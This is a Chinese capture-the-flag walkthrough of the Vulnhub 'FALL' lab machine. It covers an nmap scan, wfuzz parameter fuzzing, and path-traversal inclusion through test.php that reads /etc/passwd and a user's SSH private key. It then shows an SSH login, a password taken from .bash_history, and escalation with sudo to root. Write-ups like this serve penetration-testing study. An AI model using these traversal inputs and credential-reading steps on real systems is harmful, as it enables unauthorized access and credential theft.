kali：192.168.111.111

靶机：192.168.111.130

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.130

访问test.php，提示缺少参数

漏洞利用

wfuzz爆破参数

wfuzz -c -w /opt/zidian/SecLists-2022.2/Discovery/Web-Content/burp-parameter-names.txt --hc 404 --hh 80 http://192.168.111.130/test.php?FUZZ=../../../../../../../../../../../../../etc/passwd

文件包含/etc/passwd，发现用户qiu

http://192.168.111.130/test.php?file=../../../../../../../../../etc/passwd

包含qiu用户的私钥

http://192.168.111.130/test.php?file=../../../../../../../../../home/qiu/.ssh/id_rsa

使用私钥登录

chmod 400 id_rsa
ssh qiu@192.168.111.130 -i id_rsa

提权

查看用户qiu家目录下的.bash_history文件，发现密码：remarkablyawesomE

用户qiu的sudo权限

提升为root

sudo su

本栏目推荐文章
• 详解Linuxrc、rcS、rc.local、Profile
• Tonemapping不够用了：Local Tonemapping方案总结
• ROS2 删除一个工作空间文件夹，source后终端出现not found ...... local_setup.bash解决
• vulnhub-DC-6
• vulnhub靶场渗透学习
• OpenCL使用local内存优化矩阵乘法例子
• openEuler欧拉使用rc.local实现开机自启动
• Spark运行模式之——local模式与Standalone模式
• vulnhub-DC-5
• Lab 1-Vulnhub - Kioptix Level 1

靶机 Digitalword Vulnhub local FALL靶机digitalword vulnhub local 靶机digitalworld vulnhub local walkthrough vulnhub fall 靶机vulnhub dc 靶机hacksudo过程vulnhub 靶机metasploit过程vulnhub 靶机devrandom过程vulnhub 靶机healthcare过程vulnhub 靶机photographer过程vulnhub 靶机driftingblues vulnhub